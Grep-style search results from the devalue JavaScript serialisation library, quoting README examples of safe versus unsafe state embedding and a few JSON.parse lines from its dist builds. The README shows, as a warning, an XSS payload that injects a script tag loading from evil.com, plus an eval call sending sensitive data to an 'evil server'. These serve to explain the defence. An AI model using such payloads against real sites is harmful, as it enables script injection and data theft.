/src/README.md-64-  // NEVER DO THIS
/src/README.md:65:  var preloaded = ${JSON.stringify(state)};
/src/README.md-66-</script>`;
##############################################
/src/README.md-73-  // NEVER DO THIS
/src/README.md:74:  var preloaded = {"userinput":"</script><script src='https://evil.com/mwahaha.js'>"};
/src/README.md-75-</script>
##############################################
/src/README.md-82-<script>
/src/README.md:83:  var preloaded = ${devalue(state)};
/src/README.md-84-</script>`;
##############################################
/src/README.md-88-<script>
/src/README.md:89:  var preloaded = {userinput:"\\u003C\\u002Fscript\\u003E\\u003Cscript src=\'https:\\u002F\\u002Fevil.com\\u002Fmwahaha.js\'\\u003E"};
/src/README.md-90-</script>
##############################################
/src/README.md-108-  const sensitiveData = 'Setec Astronomy';
/src/README.md:109:  eval('sendToEvilServer(sensitiveData)'); // pwned :(
/src/README.md-110-  (0,eval)('sendToEvilServer(sensitiveData)'); // nice try, evildoer!
##############################################
/src/dist/devalue.esm.js-113-                        try {
/src/dist/devalue.esm.js:114:                            json = JSON.parse(json);
/src/dist/devalue.esm.js-115-                        }
##############################################
/src/dist/devalue.cjs.js-115-                        try {
/src/dist/devalue.cjs.js:116:                            json = JSON.parse(json);
/src/dist/devalue.cjs.js-117-                        }
##############################################
/src/dist/devalue.js-119-	                        try {
/src/dist/devalue.js:120:	                            json = JSON.parse(json);
/src/dist/devalue.js-121-	                        }
